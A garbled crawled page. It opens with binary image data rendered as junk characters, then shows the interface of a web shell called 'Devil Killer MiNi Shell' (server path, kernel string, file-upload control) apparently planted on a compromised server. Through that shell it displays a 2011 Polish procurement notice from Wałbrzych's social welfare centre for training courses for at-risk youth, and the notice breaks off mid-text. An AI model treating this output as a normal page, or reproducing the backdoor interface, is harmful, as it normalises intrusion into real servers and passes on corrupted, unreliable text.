JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111011/330226-N-2011.html

<p class="kh_header"><b>Wałbrzych: Zorganizowanie i przeprowadzenie usług o charakterze szkoleniowym i edukacyjnym z zakresu doradztwa zawodowego, usług szkolenia komputerowego oraz kursu języka angielskiego a także spotkań edukacyjnych wraz z zapewnieniem materiałów dydaktycznych dla grupy około 30 uczestników projektu konkursowego Miejskiego Ośrodka Pomocy Społecznej w Wałbrzychu pn. Centrum Aktywności Lokalnej</b><br>
<b>Numer ogłoszenia: 330226 - 2011; data zamieszczenia: 11.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Beethovena 1-2, 58-300 Wałbrzych, woj. dolnośląskie, tel. 0-74 6640800, faks 0-74 6640800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.mops.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usług o charakterze szkoleniowym i edukacyjnym z zakresu doradztwa zawodowego, usług szkolenia komputerowego oraz kursu języka angielskiego a także spotkań edukacyjnych wraz z zapewnieniem materiałów dydaktycznych dla grupy około 30 uczestników projektu konkursowego Miejskiego Ośrodka Pomocy Społecznej w Wałbrzychu pn. Centrum Aktywności Lokalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest zorganizowanie i przeprowadzenie usług o charakterze  szkoleniowym i edukacyjnym z zakresu doradztwa zawodowego, usług szkolenia komputerowego oraz kursu języka angielskiego a także spotkań edukacyjnych wraz z zapewnieniem materiałów dydaktycznych dla grupy około  30  uczestników projektu konkursowego Miejskiego Ośrodka Pomocy Społecznej w Wałbrzychu pn.: Centrum Aktywności Lokalnej. Zamawiający informuje, iż wszystkie usługi objęte przedmiotem zamówienia winny zostać przeprowadzone na terenie miasta Wałbrzycha. Zamawiający zapewni lokal z odpowiednimi  pomieszczeniami do prowadzenia przedmiotowych zajęć.
 Zajęcia winny być przeprowadzone w formie warsztatowej. Zamawiający zastrzega, iż podana w SIWZ ilość osób może ulec zmianie w trakcie realizacji przedmiotu zamówienia - nie więcej niż o 5 w stosunku do ogólnej, zaplanowanej przez Zamawiającego ilości uczestników.  

W ramach zorganizowania i przeprowadzenia usług szkoleniowych i edukacyjnych Zamawiający wymaga aby były one przeprowadzone  w następującym zakresie i tematyce:

Zamawiający dopuszcza możliwość złożenia oferty na następujące podzadania:


1)	Podzadanie Nr 1
Usługa z zakresu doradztwa zawodowego - dla 4 grup po 15 osób, młodzież w wieku  15-25 lat (osoby zagrożone wykluczeniem społecznym) . Celem szczegółowym tego działania jest analiza potencjału zawodowego oraz stworzenie ścieżki rozwoju zawodowego uczestników. W ramach realizacji tego działania zamawiający przewiduje działania związane z poradnictwem zawodowym - badaniem predyspozycji zawodowych uczestników projektu, warsztatami aktywnego poszukiwania pracy, prawami i obowiązkami pracownika, autoprezentacją. Minimum programowe szkolenia winno zawierać tematy związane z:
a)	poznaniem i zwiększeniem wiedzy na temat własnych predyspozycji zawodowych,
b)	podniesieniem umiejętności w zakresie autoprezentacji,
c)	poznaniem aktualnych wymogów na współczesnym rynku pracy oraz zasad poruszania się po nim,
d)	poznaniem praw i obowiązków wynikających z kodeksu pracy,
a)	zwiększeniem świadomości na temat wartości pracy a także podniesieniem umiejętności w zakresie sporządzania podstawowych dokumentów niezbędnych do poszukiwania i podjęcia pracy.
Przewidywane terminy realizacji usługi:
I etap -2 grupy po 15 osób  - termin realizacji od 1 listopada 2011 r. do 31 grudnia 2011r. 
II etap - 2 grupy po 15 osób - w terminie od 1 czerwca 2012 r. do 31 lipca 2012 r.
Czas trwania zajęć - 5 godzin dydaktycznych dziennie 2 razy w tygodniu, 1 trener prowadzący zajęcia przewidziany na grupę. Łącznie 160 godzin dydaktycznych zajęć.


2)	Podzadanie nr 2
Kurs szkolenia komputerowego - dla 2 grup po 15 osób łącznie, młodzież w wieku 15-25 lat (osoby zagrożone wykluczeniem społecznym). Zamawiający wymaga, aby zajęcia prowadzone były w formie warsztatowej. Celem szczegółowym tego zadania jest opanowanie umiejętności z zakresu obsługi związanej z podstawami obsługi komputera. 
Minimum programowe szkolenia winno obejmować tematy związane z:
a)	umiejętnością pisania i redagowania pism urzędowych, listów motywacyjnych oraz CV w edytorze tekstu,
b)	nabyciem umiejętności korzystanie z przeglądarek internetowych,
c)	nabyciem umiejętności związanych z wysyłaniem i odbieraniem poczty elektronicznej,
d)	nabyciem umiejętności z zakresu poszukiwania pracy przez portale pośrednictwa pracy,
e)	nabyciem umiejętności związanych z korzystaniem z grup dyskusyjnych, tworzeniem blogów, 
f)	nabyciem podstawowej wiedzy i umiejętności w zakresie tworzenia stron www, 
g)	poznaniem idei  e-learningu.
Przewidywane terminy realizacji usługi: 
I etap - grupa 15 osób - termin realizacji od 1 listopada 2011 r. do 30 kwietnia  2012 r. 
II etap - grupa 15 osób - termin realizacji od 1 czerwca 2012 r. do 31 listopada 2012 r. Czas trwania zajęć - 3 godziny dydaktyczne dziennie 2 razy w tygodniu, 1 trener prowadzący zajęcia przewidziany na grupę. Łącznie 288 godzin dydaktycznych zajęć.

3)	Podzadanie Nr 3
Kurs języka angielskiego - dla 2 grup po 15 osób łącznie, młodzież w wieku 15-25 lat (osoby zagrożone wykluczeniem społecznym). Celem szczegółowym tego działania jest nabycie przez uczestników wiedzy z zakresu znajomości języka angielskiego na podstawowym poziomie, zgodnie z przyjętym programem kursu oraz zwiększenie motywacji do dalszej edukacji. 
Przewidywane terminy realizacji usługi:
 I etap - grupa 15 osób - termin realizacji od 2 stycznia 2012 do 30 kwietnia 2012 r.,
II etap - grupa 15 osób -  termin realizacji od 1 sierpnia 2012 r. do 30 listopada 2012 r. Czas trwania zajęć - 2 godziny dydaktyczne 2 razy w tygodniu. Łącznie 128 godzin dydaktycznych zajęć. 

4)	Podzadanie Nr 4
Prowadzenie i organizacja spotkań edukacyjnych - dla 2 grup po 15 osób łącznie, młodzież w wieku 15-25 lat (osoby  zagrożone wykluczeniem społecznym). Zamawiający wymaga, aby zajęcia prowadzone były w formie warsztatowej. Celem zajęć jest rozwój umiejętności społecznych. W ramach działania Zamawiający zaplanował tematy związane z:
a)	poszerzaniem wiedzy na temat współczesnych zagrożeń cywilizacyjnych, 
b)	edukacją w zakresie tematu antykoncepcji i świadomego planowania rodziny,
c)	zaburzeń odżywiania,
d)	 pierwszej pomocy, 
e)	zabiegów pielęgnacyjnych dla niemowląt.  
Przewidywane terminy realizacji usługi: 
I etap - grupa 15 osób - termin realizacji od 1 listopada 2011 do 31 grudnia 2011
II etap - grupa 15 osób - termin realizacji od 1 czerwca 2012 r. do 31 lipca 2012 
Czas trwania zajęć - 2 godziny dydaktyczne 1 raz w tygodniu). Łącznie 64 godziny dydaktyczne zajęć.
Wykonawca wedle swego wyboru może złożyć oferty na jedno, kilka lub wszystkie podzadania. Zakres obowiązków i wymagań wobec wykonawcy określonych w pkt. 8 siwz należy spełniać dla każdego z podzadań osobno.



Po ukończonym szkoleniu każdy z uczestników winien otrzymać:
1)	Zaświadczenie o ukończeniu szkolenia, w którego treści znajdzie się zapis o ilości godzin szkolenia odbytych przez danego uczestnika, zgodnie z obowiązującymi w tym zakresie przepisami Ministra Edukacji i Nauki. Wykonawca w terminie do 3 dni od daty zakończenia każdego typu szkolenia zobowiązany będzie do wydania uczestnikom zaświadczenia o ukończeniu szkolenia, w którego treści znajdzie się zapis o ilości godzin szkolenia odbytych przez uczestnika.
2)	Certyfikat potwierdzający ukończenie działań o charakterze szkoleniowym i edukacyjnym pn. Centrum Aktywności Lokalnej - zawierający zestawienie wszystkich działań szkoleniowych i edukacyjnych zawartych w przedmiocie zamówienia, z wyszczególnieniem informacji o ilości godzin i rodzajów szkoleń, z odpowiednim oznakowaniem promocyjnym uwzględniającym Wytyczne dotyczące oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki z lutego 2009 r. oraz Strategię Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007-2013 wraz z załącznikiem Nr 1, a także Wytycznymi w zakresie informacji i promocji, wydany przez organizatora szkolenia. Wykonawca zobowiązany będzie do przekazania w ciągu 3 tygodni od daty rozpoczęcia szkoleń, wzór w/w certyfikatu (z odpowiednim oznakowaniem unijnym) potwierdzającego ukończenie przez uczestnika projektu szkoleń z cyklu Centrum Aktywności Lokalnej (w pliku PDF). Powyższy dokument musi być zgodny z wymogami wynikającymi z Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z lutego 2009 r., Strategią Komunikacji Funduszy Europejskich w ramach Narodowej Strategii Spójności na lata 2007 - 2013 wraz z załącznikiem Nr 1 oraz Wytycznych w zakresie informacji i promocji. Po akceptacji przez Zamawiającego w/w wzoru w pliku PDF, Wykonawca bezzwłocznie winien (przed wydaniem ostatecznego dokumentu) przedłożyć jeden wypełniony, papierowy egzemplarz Zamawiającemu, celem jego ostatecznej akceptacji, co będzie warunkować wydanie w/w dokumentu uczestnikom szkoleń.

Kserokopię w/w dokumentów (certyfikatów oraz zaświadczeń o ukończeniu szkolenia) powinny być potwierdzone za zgodność z oryginałem przez Wykonawcę zamówienia, podpisane przez uczestnika szkolenia (złożony podpis wraz z datą potwierdzenia odbioru) i przekazane Zamawiającemu w terminie do 5 dni roboczych od zakończenia szkolenia. 


W ramach świadczonej usługi Wykonawca zobowiązany będzie do:

1)	Zapewnienia materiałów szkoleniowych, zgodnie z opracowanym programem szkolenia (książek, skryptów, itp.) 
2)	Realizacji zajęć szkoleniowych, zgodnie z opracowanym programem nauczania dla poszczególnych działań,  od poniedziałku do piątku (z wyłączeniem sobót, niedziel 
i świat) w przedziale czasowym od 8.00 do 16.00, przy czym zajęcia nie mogą się odbywać dłużej niż 5 godzin dydaktycznych dziennie, w  zagwarantowanych przez Zamawiającego odpowiednio przygotowanych pomieszczeniach, spełniających wymagania Kodeksu Pracy, Prawa Budowlanego oraz przepisów odnośnie bezpieczeństwa i higieny pracy a także przepisów przeciwpożarowych.  
3)	W ramach nadzoru wewnętrznego służącego podnoszeniu jakości prowadzonych szkoleń wyznaczenia (personalnie) opiekuna każdego ze szkoleń sprawującego nadzór nad jego poprawną realizacją.
4)	Zapewnienia wykwalifikowanej kadry trenerów posiadających stosowne uprawnienia,  zdolnych do wykonania przedmiotu zamówienia. 
5)	Prowadzenia dziennika zajęć edukacyjnych, zawierających datę, wymiar godzin i tematy zajęć edukacyjnych oraz opracowania i prowadzenia ankiet diagnozujących ( na początek i koniec trwania zajęć) uczestników szkolenia.

Potwierdzenie udziału w szkoleniach przez uczestników szkolenia Wykonawca przekaże Zamawiającemu każdorazowo po zakończeniu kursu, szkolenia. Imienne listy obecności sporządzane będą za każdy dzień szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Maksymalnie w wysokości 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.32.00-0, 85.31.23.20-8, 80.58.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga uiszczenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do treści złożonej oferty na niżej  		wymienionych warunkach:
 1) w stosunku do terminu realizacji umowy: 
a) terminu wykonania zamówienia w przypadku gdy konieczność ich wprowadzenia wynikła z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
b) sposobu i zakresu realizacji zamówienia w przypadku gdy konieczność ich wprowadzenia wynikła z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
       2) w stosunku do osób:
   		a) zmiany osób reprezentujących w przypadku zmian organizacyjnych,
b) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np. gdy obniży to koszty usługi),
Wszelkie zmiany do umowy wymagają zgody Zamawiającego oraz będą wprowadzane do umowy w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/www.mops.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wałbrzych, ul. Beethovena 1-2, 58-300 Wałbrzych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2011 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Wałbrzychu, ul. Beethovena 1-2, 58-300 Wałbrzych - pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w Ramach Europejskiego Funduszu Społecznego - Priorytet I - Zatrudnienie i integracja społeczna, Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, Poddziałanie 1.17 Rewitalizacja społeczna..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podzadanie Nr 1 - Usługa z zakresu doradztwa zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 4 grup po 15 osób, młodzież w wieku  15-25 lat (osoby zagrożone wykluczeniem społecznym) . Celem szczegółowym tego działania jest analiza potencjału zawodowego oraz stworzenie ścieżki rozwoju zawodowego uczestników. W ramach realizacji tego działania zamawiający przewiduje działania związane z poradnictwem zawodowym - badaniem predyspozycji zawodowych uczestników projektu, warsztatami aktywnego poszukiwania pracy, prawami i obowiązkami pracownika, autoprezentacją. Minimum programowe szkolenia winno zawierać tematy związane z:
a)	poznaniem i zwiększeniem wiedzy na temat własnych predyspozycji zawodowych,
b)	podniesieniem umiejętności w zakresie autoprezentacji,
c)	poznaniem aktualnych wymogów na współczesnym rynku pracy oraz zasad poruszania się po nim,
d)	poznaniem praw i obowiązków wynikających z kodeksu pracy,
a)	zwiększeniem świadomości na temat wartości pracy a także podniesieniem umiejętności w zakresie sporządzania podstawowych dokumentów niezbędnych do poszukiwania i podjęcia pracy.
Przewidywane terminy realizacji usługi:
I etap -2 grupy po 15 osób  - termin realizacji od 1 listopada 2011 r. do 31 grudnia 2011r. 
II etap - 2 grupy po 15 osób - w terminie od 1 czerwca 2012 r. do 31 lipca 2012 r.
Czas trwania zajęć - 5 godzin dydaktycznych dziennie 2 razy w tygodniu, 1 trener prowadzący zajęcia przewidziany na grupę. Łącznie 160 godzin dydaktycznych zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podzadanie Nr 2 - Kurs szkolenia komputerowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 2 grup po 15 osób łącznie, młodzież w wieku 15-25 lat (osoby zagrożone wykluczeniem społecznym). Zamawiający wymaga, aby zajęcia prowadzone były w formie warsztatowej. Celem szczegółowym tego zadania jest opanowanie umiejętności z zakresu obsługi związanej z podstawami obsługi komputera. 
Minimum programowe szkolenia winno obejmować tematy związane z:
a)	umiejętnością pisania i redagowania pism urzędowych, listów motywacyjnych oraz CV w edytorze tekstu,
b)	nabyciem umiejętności korzystanie z przeglądarek internetowych,
c)	nabyciem umiejętności związanych z wysyłaniem i odbieraniem poczty elektronicznej,
d)	nabyciem umiejętności z zakresu poszukiwania pracy przez portale pośrednictwa pracy,
e)	nabyciem umiejętności związanych z korzystaniem z grup dyskusyjnych, tworzeniem blogów, 
f)	nabyciem podstawowej wiedzy i umiejętności w zakresie tworzenia stron www, 
g)	poznaniem idei  e-learningu.
Przewidywane terminy realizacji usługi: 
I etap - grupa 15 osób - termin realizacji od 1 listopada 2011 r. do 30 kwietnia  2012 r. 
II etap - grupa 15 osób - termin realizacji od 1 czerwca 2012 r. do 31 listopada 2012 r. Czas trwania zajęć - 3 godziny dydaktyczne dziennie 2 razy w tygodniu, 1 trener prowadzący zajęcia przewidziany na grupę. Łącznie 288 godzin dydaktycznych zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.32.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podzadanie Nr 3 - Kurs języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dla 2 grup po 15 osób łącznie, młodzież w wieku 15-25 lat (osoby zagrożone wykluczeniem społecznym). Celem szczegółowym tego działania jest nabycie przez uczestników wiedzy z zakresu znajomości języka angielskiego na podstawowym poziomie, zgodnie z przyjętym programem kursu oraz zwiększenie motywacji do dalszej edukacji. 
Przewidywane terminy realizacji usługi:
 I etap - grupa 15 osób - termin realizacji od 2 stycznia 2012 do 30 kwietnia 2012 r.,
